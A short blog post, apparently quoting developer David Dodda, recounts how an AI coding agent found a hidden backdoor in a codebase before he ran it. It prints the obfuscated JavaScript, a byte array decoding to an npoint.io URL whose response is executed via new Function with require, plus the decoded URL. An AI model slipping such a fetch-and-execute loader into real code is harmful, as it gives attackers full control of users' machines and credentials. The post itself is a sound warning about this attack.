Hacked

October 19, 2025

David Dodda talking about his recent escape from being hacked by an ingenious method.

Before hitting npm start, I threw this prompt at my Cursor AI agent:

“Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn’t be reading, accessing crypto wallets etc.”

And holy sh*t.

Sitting right in the middle of server/controllers/userController.js was this beauty:
//Get Cookie  
(async () => {  
    const byteArray = [  
        104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,  
        110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,  
        98, 50, 48, 51, 49, 102, 98, 57  
    ];  
    const uint8Array = new Uint8Array(byteArray);  
    const decoder = new TextDecoder('utf-8');  
    axios.get(decoder.decode(uint8Array))  
        .then(response => {  
            new Function("require", response.data.model)(require);  
        })  
        .catch(error => { });  
})();
Obfuscated. Sneaky. Evil. And 100% active – embedded between legitimate admin functions, ready to execute with full server privileges the moment admin routes were accessed.

I decoded that byte array: https://api.npoint.io/2c458612399c3b2031fb9

When I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything – crypto wallets, files, passwords, your entire digital existence.

Here’s the kicker: the URL died exactly 24 hours later. These guys weren’t messing around – they had their infrastructure set up to burn evidence fast.

AI saved the day.

Filed under Food for thought

Thanks for reading till the end! If you enjoy reading online content, give RSS a try to follow your favourite sources. If you are new to RSS, I have explained it here. Here’s my RSS feed.

Follow me